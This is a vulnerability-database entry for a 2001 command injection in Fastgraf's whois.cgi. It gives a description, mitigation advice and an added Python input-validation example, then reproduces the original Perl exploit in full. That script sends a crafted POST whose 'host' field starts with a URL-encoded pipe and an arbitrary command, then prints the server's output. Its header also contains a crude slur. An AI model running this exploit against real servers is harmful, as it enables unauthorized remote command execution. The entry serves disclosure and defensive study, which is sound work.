vendor: whois.cgi
by: Marco van Berkum
CVSS: 7.5 HIGH
Remote Code Execution
CWE: 78
Product Name: whois.cgi
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2001

Fastgraf’s whois.cgi Exploit

This script exploits a command injection vulnerability in Fastgraf's whois.cgi script that allows an attacker to execute arbitrary commands on the target server. It sends a crafted POST request whose 'host' parameter begins with a URL-encoded pipe character (%7c) followed by the command, then captures the command's output from the response and displays it. The vulnerability was discovered by Marco van Berkum, and the script can be found on his homepage at http://ws.obit.nl.

Mitigation:

The recommended mitigation is to update Fastgraf's whois.cgi script to a patched version that addresses the vulnerability. The script should also run with the least privileges necessary, and input validation should be implemented to prevent command injection attacks.
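One way to implement the input validation described above, as an added Python example (not Fastgraf's code and not part of the original entry): the 'host' field is checked against a hostname allow-list and the lookup runs without a shell. The function names and sample POST bodies are constructed for illustration, and a `whois` client on the PATH is assumed.

```python
import re
import subprocess
from urllib.parse import parse_qs

# One hostname label: letters, digits, hyphens; no leading or trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def valid_host(value):
    """Allow-list check: dotted hostname or IPv4 literal, nothing else."""
    if not value or len(value) > 253:
        return False
    return all(_LABEL.fullmatch(label) for label in value.split("."))


def parse_host(body):
    """Return the validated 'host' field of a form-encoded POST body, or None."""
    values = parse_qs(body, keep_blank_values=True).get("host", [])
    # Reject missing, repeated, or non-hostname values (e.g. a leading '|').
    if len(values) != 1 or not valid_host(values[0]):
        return None
    return values[0]


def whois_argv(host):
    """Argument vector for the lookup; the host is one argv entry, never shell text."""
    # A validated host cannot start with '-', so it cannot be read as an option.
    return ["whois", host]


def lookup(body, timeout=10):
    """Validate the request, then run whois with no shell involved."""
    host = parse_host(body)
    if host is None:
        return "invalid host"
    result = subprocess.run(whois_argv(host), capture_output=True,
                            text=True, timeout=timeout, check=False)
    return result.stdout


if __name__ == "__main__":
    # Constructed sample bodies; the second has the shape of the request above.
    for sample in ("host=example.com", "host=%7cls -al", "host=example.com%3Bid"):
        print(repr(sample), "->", parse_host(sample))
```

Validation alone is not the whole fix: passing the value as a single argv element means shell metacharacters are never interpreted, even if the allow-list is later loosened.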
Source

Exploit-DB raw data:

#!/usr/bin/perl
###############################################################
# whois.pl - Marco van Berkum - m.v.berkum@obit.nl            #
# homepage: http://ws.obit.nl - exploits Fastgraf's whois.cgi #                           
#                                                             #
# DO NOT EDIT THIS HEADER, else the bedbugs will bite         #
# Greets to sigmo for finding stupid POST examples            #
# Also greetings to DUCKEL (YES YOU HAVE CREDIT NOW ;))       #
#                                                             #
# Use like this:                                              #
# ./whois.pl www.ifyoureadthisyouaregay.com "ls -al"          #
###############################################################

use IO::Socket;
$host = $ARGV[0]; $command = $ARGV[1]; $length = length($command) + 8;

$sock = new IO::Socket::INET (PeerAddr => $host, PeerPort => 80, Proto    => 'tcp');
if($sock) {
print $sock "POST http://$host/cgi-bin/whois.cgi HTTP/1.0
User-Agent: Whois Meta Character Exploit Browser :P
Host: $host
Content-length: $length

host=%7c$command\n\n";
sleep(3); # change to lower or higher, depending on your connection 
sysread($sock, $buffer, 100000);
        ($empty, $output) = split(/PRE/, $buffer);
        $output =~ s/[\<\>\/]//g;
        if($output) {
        print("$output\n");
       } else { print "No data, or not vulnerable\n";
     }
    } 
close $sock;


# milw0rm.com [2001-01-12]